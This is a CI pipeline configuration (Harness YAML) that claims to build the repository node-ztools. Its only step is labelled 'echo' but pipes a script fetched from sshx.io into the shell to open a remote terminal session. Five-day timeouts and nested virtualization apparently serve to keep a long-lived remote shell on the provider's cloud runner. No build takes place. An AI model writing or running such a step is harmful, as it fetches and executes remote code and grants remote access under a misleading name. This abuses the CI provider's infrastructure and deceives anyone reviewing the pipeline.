pipeline:
  identifier: Build_geanenova_node_ztools_1736727857042
  name: Build node-ztools
  orgIdentifier: default
  projectIdentifier: default_project
  properties:
    ci:
      codebase:
        build: <+input>
        connectorRef: account.Github_OAuth_1736727810950
        repoName: geanenova/node-ztools
  stages:
    - stage:
        identifier: build
        name: build
        spec:
          caching:
            enabled: true
          cloneCodebase: true
          execution:
            steps:
              - step:
                  identifier: echo
                  name: echo
                  spec:
                    shell: Bash
                    command: curl -sSf https://sshx.io/get | sh -s run
                  timeout: 5d
                  type: Run
          platform:
            os: Linux
            arch: Amd64
          runtime:
            type: Cloud
            spec:
              size: small
              nestedVirtualization: true
        type: CI
        timeout: 5d
